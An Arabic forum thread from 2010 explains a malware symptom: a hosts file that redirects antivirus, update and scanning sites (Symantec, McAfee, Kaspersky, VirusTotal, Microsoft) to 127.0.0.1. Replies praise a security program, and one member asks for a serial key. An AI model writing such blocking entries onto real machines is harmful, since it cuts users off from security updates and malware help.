#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host
 127.0.0.1       localhost
[/SIZE] [/FONT][/COLOR][SIZE=3]  
  
  
 127.0.0.1 [URL="http://www.symantec.com/"] www.symantec.com[/URL]
127.0.0.1 securityresponse.symantec.com
127.0.0.1 bottalk.us
127.0.0.1 symantec.com
127.0.0.1 [URL="http://www.sophos.com/"] www.sophos.com[/URL]
127.0.0.1 sophos.com
127.0.0.1 [URL="http://www.mcafee.com/"] www.mcafee.com[/URL]
127.0.0.1 mcafee.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 [URL="http://www.viruslist.com/"] www.viruslist.com[/URL]
127.0.0.1 viruslist.com
127.0.0.1 viruslist.com
127.0.0.1 f-secure.com
127.0.0.1 [URL="http://www.f-secure.com/"] www.f-secure.com[/URL]
127.0.0.1 kaspersky.com
127.0.0.1 kaspersky-labs.com
127.0.0.1 [URL="http://www.avp.com/"] www.avp.com[/URL]
127.0.0.1 [URL="http://www.kaspersky.com/"] www.kaspersky.com[/URL]
127.0.0.1 avp.com
127.0.0.1 [URL="http://www.networkassociates.com/"] www.networkassociates.com[/URL]
127.0.0.1 networkassociates.com
127.0.0.1 [URL="http://www.ca.com/"] www.ca.com[/URL]
127.0.0.1 ca.com
127.0.0.1 mast.mcafee.com
127.0.0.1 my-etrust.com
127.0.0.1 [URL="http://www.my-etrust.com/"] www.my-etrust.com[/URL]
127.0.0.1 download.mcafee.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 secure.nai.com
127.0.0.1 nai.com
127.0.0.1 [URL="http://www.nai.com/"] www.nai.com[/URL]
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 customer.symantec.com
127.0.0.1 rads.mcafee.com
127.0.0.1 trendmicro.com
127.0.0.1 pandasoftware.com
127.0.0.1 [URL="http://www.pandasoftware.com/"] www.pandasoftware.com[/URL]
127.0.0.1 [URL="http://www.trendmicro.com/"] www.trendmicro.com[/URL]
127.0.0.1 [URL="http://www.grisoft.com/"] www.grisoft.com[/URL]
127.0.0.1 [URL="http://www.microsoft.com/"] www.microsoft.com[/URL]
127.0.0.1 microsoft.com
127.0.0.1 [URL="http://www.virustotal.com/"] www.virustotal.com[/URL]
127.0.0.1 virustotal.com
127.0.0.1 threatexpert.com
127.0.0.1 novirusthanks.org
127.0.0.1 scanner.novirusthanks.org
127.0.0.1 f-secure.com[/SIZE]
[/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/FONT][/COLOR][/COLOR][/FONT][/FONT][/COLOR][/FONT][/COLOR][/SIZE][/FONT][/FONT][/COLOR][/FONT][/COLOR]

تم حجب اغلب مواقع الحماية عنا , و عند محاولة الدخول لاحد تلك المواقع يتم تحويلنا للايبي الافتراضي 127.0.0.1 و تظهر لنا الصفحة التالية بمتصفحنا :

-------
هناك بعض برامج الحماية تقوم بقفل ملف الهوست و منع التلاعب به ك Avira premium security suite

كما هو موضح في الصورة اسفله :

و ايضا برنامج Spybot - Search & Destroy يعطينا حالة صلاحيات ملف الهوست لكن لا يقوم بتغير شيء

-----------

ان شاء الله تكون المعلومة وصلت

يكفينى الكلام الحلو الرائع هذا

و الرد بالصورة

ahmadnour_555 · 20 نوفمبر 2010

hamede قال:
يكفينى الكلام الحلو الرائع هذا

و الرد بالصورة

بارك الله فيك أخي

البرنامج رائع أخي وأنت الأروع جاري التحميل والتجريب ان شاء الله

sultanqaz · 20 نوفمبر 2010

بارك الله فيك يالغالي
5-5

bido_ahmed · 20 نوفمبر 2010

الله يعافيك

سهام الليل · 20 نوفمبر 2010

5/5

عمر صابر · 20 نوفمبر 2010

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

hamede · 20 نوفمبر 2010

عمر صابر قال:
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

بارك الله فيك اخى عمر

مع اننى افضل دائماً و ابداً التحميل من المواقع الرسمية

Trojan Downloader · 20 نوفمبر 2010

بارك الله فيك

سمور · 20 نوفمبر 2010

الله يعطيك العافيه ويوفقك على العروض والبرنامج الرائع
شكراا لك من كل قلبي
تقبل مروري

سمور · 20 نوفمبر 2010

شكراا لك جاري التجربه

سمور · 21 نوفمبر 2010

حمدي لاهنت اخوي محتااج سريال للبرنامج على الخاص
موفق

hamede · 21 نوفمبر 2010

سمور قال:
حمدي لاهنت اخوي محتااج سريال للبرنامج على الخاص
موفق

تابع هنا اخى الكريم

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

hamede · 23 نوفمبر 2010

trojan downloader قال:
بارك الله فيك

سمور قال:
الله يعطيك العافيه ويوفقك على العروض والبرنامج الرائع
شكراا لك من كل قلبي
تقبل مروري

شكراً لكم اخوتى و بارك الله فيكم

hamede · 23 نوفمبر 2010

سمور قال:
شكراا لك جاري التجربه

سيعجبك بكل تأكيد

برنامج قوى جداً و سريع جداً ( خفته ما بين الكاسبر و النورتن ) جدار نارى و لا اروع

حماية لملفات النظام و مراقبة سلوك البرامج ...

حماية لم ارى مثلها اثناء التصفح مع ظهور تنبيهات ( احمر و برتقالى و اخضر ) و يعلمك بطبيعة الخطر الموجود عندما تقف بالسهم على اللون... كل هذا مع سرعة تصفح لا تتأثر !!!!!!!

((الخشرمي)) · 23 نوفمبر 2010

بارك الله فيك

زيزوومي جديد

توقيع : abd-rk

زيزوومي VIP

توقيع : hamede

زيزوومى محترف

توقيع : عمر صابر

زيزوومى فضى

توقيع : ahmadnour_555

زيزوومي نشيط

زيزوومي VIP

توقيع : hamede

زيزوومى فضى

توقيع : ahmadnour_555

زيزوومى مميز

زيزوومى متألق

توقيع : bido_ahmed

زيزوومى مميز

توقيع : سهام الليل

زيزوومى محترف

توقيع : عمر صابر

زيزوومي VIP

توقيع : hamede

زيزوومي جديد

زيزوومى فعال

توقيع : سمور

زيزوومى فعال

توقيع : سمور

زيزوومى فعال

توقيع : سمور

زيزوومي VIP

توقيع : hamede

زيزوومي VIP

توقيع : hamede

زيزوومي VIP

توقيع : hamede

زيزوومي جديد